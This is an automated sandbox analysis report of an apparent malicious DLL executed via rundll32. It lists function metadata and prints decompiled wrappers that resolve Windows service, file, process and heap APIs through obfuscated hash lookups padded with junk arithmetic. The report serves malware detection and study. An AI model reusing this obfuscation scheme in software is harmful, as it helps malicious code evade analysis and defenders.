Opcode ID: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
Instruction ID: b81a2157dff59843e5c721b5fa459b83a8bef19e296eb3c7ce89af4ff474d23a
Opcode Fuzzy Hash: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
Instruction Fuzzy Hash: 3BE012358D42B4CBFB04FB20ED883A93BE8FB46305F514527D04692165DB346C59DF52

Uniqueness

Uniqueness Score: -1.00%

Function 10027CC2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 10027CFB

Strings

(, xrefs: 10027E0B

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ClearVariant
String ID: (
API String ID: 1473721057-3887548279
Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100259EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 100259F5

Strings

@, xrefs: 10025A58

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID: @
API String ID: 431132790-2766056989
Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1001508F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
PathFindExtensionA.SHLWAPI(?), ref: 100150CB

Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33

Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE

Strings

%s.dll, xrefs: 100150D1

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
Instruction ID: 0816ccb3c2c5dc3d5c2f43fd153125c4ae2bbce82e663fde520804fb1fdab18a
Opcode Fuzzy Hash: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
Instruction Fuzzy Hash: 9901B971A10118BBDF09DB74DD96AEEB3B8DF04B01F0105E9EA02DB140EEB1EE448A61

Uniqueness

Uniqueness Score: -1.00%

Function 10001FF0 Relevance: 5.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
SetLastError.KERNEL32(0000007E), ref: 10002087

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10020B38 Relevance: 5.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 10020B95
LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
LocalFree.KERNEL32(?), ref: 10020BAE
TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10020E5D Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
String ID:
API String ID: 3253506028-0
Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61

Uniqueness

Uniqueness Score: -1.00%

Function 100206C8 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
TlsGetValue.KERNEL32 ref: 100206E6
LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 2656, Parent PID: 1180COMMON

Execution Graph

Execution Coverage:	15.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1080
Total number of Limit Nodes:	17

Executed Functions

Function 001E912C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E001E912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t32;
				signed int _t34;
				int _t43;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t43 = __ecx;
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E001F20B9(_t24);
				_v12 = 0x4657ea;
				_t34 = 0x1b;
				_v12 = _v12 / _t34;
				_v12 = _v12 ^ 0x000ac4f3;
				_v8 = 0xb5c996;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x19;
				_v8 = _v8 + 0x3329;
				_v8 = _v8 ^ 0x01161fa0;
				E001FAA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
				_t32 = OpenSCManagerW(0, 0, _t43); // executed
				return _t32;
			}

0x001e912f
0x001e9130
0x001e9133
0x001e9138
0x001e913a
0x001e913d
0x001e913e
0x001e9141
0x001e9143
0x001e9144
0x001e9149
0x001e915a
0x001e9162
0x001e916a
0x001e9171
0x001e9178
0x001e9186
0x001e9189
0x001e9190
0x001e919d
0x001e91a8
0x001e91af

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 001E91A8

Strings

WF, xrefs: 001E9149

Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: WF
API String ID: 1889721586-2390014890
Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
Instruction ID: b34791d0c7d7f6f977ba0088a6eec1a9865b2e593dba120cd6c6e530b2ddb348
Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
Instruction Fuzzy Hash: CD01697190120CFBEB04CF95DD4ACAFBFB8EB95714F508099F404A7200D7B15F149AA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E42C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E001E42C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t34 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F20B9(_t24);
				_v8 = 0x971c9e;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xbdaa;
				_v8 = _v8 | 0x44f2c0c3;
				_v8 = _v8 ^ 0x44fb9439;
				_v12 = 0x762558;
				_v12 = _v12 | 0xdc63e739;
				_v12 = _v12 ^ 0xdc7b8d87;
				E001FAA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
				return _t29;
			}

0x001e42c7
0x001e42c8
0x001e42ca
0x001e42cd
0x001e42cf
0x001e42d2
0x001e42d5
0x001e42d8
0x001e42db
0x001e42dc
0x001e42dd
0x001e42e2
0x001e42ec
0x001e42f5
0x001e42fc
0x001e4303
0x001e430a
0x001e4311
0x001e4318
0x001e4330
0x001e433f
0x001e4345

APIs

OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,001F4A8F,?,?,2635DC09), ref: 001E433F

Strings

X%v, xrefs: 001E430A

Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: X%v
API String ID: 3098006287-3430654708
Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
Instruction ID: 8c9557007b6d7835154021bdc89200b87e386ad1112f3f96cad13e5a7d4f3ba6
Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
Instruction Fuzzy Hash: 8E0104B281120CFBDF15DFD4D9468EEBF79EF14314F148188F90962221D3729B609B91

Uniqueness

Uniqueness Score: -1.00%

Function 001E8F65 Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 35%

			E001E8F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t32;
				void* _t38;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F20B9(_t32);
				_v28 = 0xee6fdc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x957ab3;
				_v12 = _v12 ^ 0x02d9a910;
				_v12 = _v12 + 0xffff8488;
				_v12 = _v12 ^ 0x02485b8e;
				_v8 = 0xf6b813;
				_v8 = _v8 + 0xffff9c70;
				_v8 = _v8 + 0xffff858c;
				_v8 = _v8 ^ 0x00f72129;
				E001FAA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
				return _t38;
			}

0x001e8f6d
0x001e8f72
0x001e8f73
0x001e8f76
0x001e8f79
0x001e8f7c
0x001e8f7f
0x001e8f80
0x001e8f83
0x001e8f86
0x001e8f8a
0x001e8f8b
0x001e8f90
0x001e8f9f
0x001e8faa
0x001e8fb1
0x001e8fb2
0x001e8fb9
0x001e8fc0
0x001e8fc7
0x001e8fce
0x001e8fd5
0x001e8fdc
0x001e8fe3
0x001e8ff0
0x001e9009
0x001e9010

APIs

CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 001E9009

Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
Instruction ID: 4f799f34dca0472f3f0e24c2d70c0a7b5f47b9c011130b39fe16bd2e6cc54b39
Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
Instruction Fuzzy Hash: D411197290021DBBCF219FA5DD098DFBFB5EF58354F118148FA0862121C3728A65EB91

Uniqueness

Uniqueness Score: -1.00%

Function 001E7F5D Relevance: 1.6, APIs: 1, Instructions: 54
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,001EAD99,?,?,?,181C8C04,001EAD99), ref: 001E7FEB

Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
Instruction ID: 12ad51ed2f9647813424397601e6ec884d4ce9fd464eaf0920f84070245b276f
Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
Instruction Fuzzy Hash: 7711037240212CBBDF619F91DD09CEF7F79EF093A4F148144FA0921120D3728A60EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E4DDD Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E001E4DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				int _t38;
				signed int _t40;
				signed int _t44;
				struct _SHFILEOPSTRUCTW* _t45;

				_push(_a12);
				_t45 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001F20B9(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x8324bd;
				_v20 = 0xe59c0f;
				_v12 = 0xfa6a5a;
				_v12 = _v12 | 0x6fcfbea7;
				_t40 = 0x1a;
				_push(0x3771311d);
				_push(_t40);
				_v12 = _v12 * 0x42;
				_v12 = _v12 ^ 0xdff430a4;
				_v8 = 0x460bc4;
				_v8 = _v8 | 0x3946640e;
				_push(0xdf0d4f1a);
				_v8 = _v8 / _t40;
				_v8 = _v8 + 0x2a2;
				_v8 = _v8 ^ 0x023f16a4;
				_t44 = 0x58;
				E001FAA30(_t44);
				_t38 = SHFileOperationW(_t45); // executed
				return _t38;
			}

0x001e4de4
0x001e4de7
0x001e4de9
0x001e4dec
0x001e4def
0x001e4df1
0x001e4df6
0x001e4dfd
0x001e4e06
0x001e4e0d
0x001e4e14
0x001e4e21
0x001e4e22
0x001e4e27
0x001e4e28
0x001e4e2b
0x001e4e32
0x001e4e39
0x001e4e45
0x001e4e4a
0x001e4e4d
0x001e4e54
0x001e4e63
0x001e4e64
0x001e4e6d
0x001e4e73

APIs

SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 001E4E6D

Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
Instruction ID: a1bfcb424a94db4fc21ccc2ff31a451566d31be331ade8fb1b39e2aef7a805a7
Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
Instruction Fuzzy Hash: 91016DB6E0120DFBCB14EFA4D9469DEBFB4EF40314F50C088E908A7251D7B44B549B91

Uniqueness

Uniqueness Score: -1.00%

Function 001E5DDD Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E001E5DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;
				void* _t31;
				void* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_t34 = __ecx;
				E001F20B9(_t21);
				_v12 = 0x9fac18;
				_v12 = _v12 ^ 0x90454497;
				_v12 = _v12 ^ 0x90d3245f;
				_v8 = 0x647eb;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xffff0b9f;
				_v8 = _v8 ^ 0xfff54d3d;
				_t25 = E001FAA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
				return _t26;
			}

0x001e5de9
0x001e5deb
0x001e5dfa
0x001e5dff
0x001e5e09
0x001e5e15
0x001e5e1c
0x001e5e23
0x001e5e27
0x001e5e2b
0x001e5e32
0x001e5e4a
0x001e5e58
0x001e5e5f

APIs

SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 001E5E58

Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
Instruction ID: 1d3ccd11688934e9687a919bb63de196247ad593cb65fd3dc93df17f2ff2648a
Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
Instruction Fuzzy Hash: 5D01BC7690120CBBDB24DE90CC0AEEEBF74EF55314F108088F60466250D7B15B109BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E1E22 Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E001E1E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				void* _t34;
				signed int _t36;
				long _t42;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t42 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F20B9(_t27);
				_v12 = 0x309d17;
				_v12 = _v12 | 0x1b560655;
				_v12 = _v12 ^ 0x1b78328a;
				_v8 = 0xa187d;
				_v8 = _v8 + 0xa972;
				_t36 = 0x67;
				_v8 = _v8 / _t36;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x000b519a;
				E001FAA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
				return _t34;
			}

0x001e1e25
0x001e1e26
0x001e1e28
0x001e1e2b
0x001e1e2d
0x001e1e30
0x001e1e33
0x001e1e37
0x001e1e38
0x001e1e3d
0x001e1e47
0x001e1e50
0x001e1e57
0x001e1e5e
0x001e1e6a
0x001e1e72
0x001e1e7a
0x001e1e7e
0x001e1e91
0x001e1ea0
0x001e1ea6

APIs

RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,001E80DB,?,00000000,AF136809), ref: 001E1EA0

